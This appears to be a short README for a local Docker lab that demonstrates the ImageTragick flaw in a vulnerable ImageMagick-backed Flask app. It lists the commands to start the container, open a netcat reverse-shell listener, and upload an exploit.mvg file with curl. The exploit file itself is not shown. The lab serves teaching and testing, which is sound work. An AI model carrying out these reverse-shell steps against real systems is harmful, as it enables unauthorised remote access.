Run a containerised Flask app that relies on a version of ImageMagic that is vulnerable to the ImageTragick bug.
-
Download this image and create a container:
$ docker run -d --name imagetragick -p 127.0.0.1:8080:8080 craighurley/docker-imagetragick -
Listen for the reverse shell:
$ nc -l -n -vvv -p 4443 -
Edit the contents of
exploit.mvgso that it uses the correct IP address thatncis listening on. -
Upload exploit to vulnerable application:
$ curl -v -F file=@exploit.mvg http://127.0.0.1:8080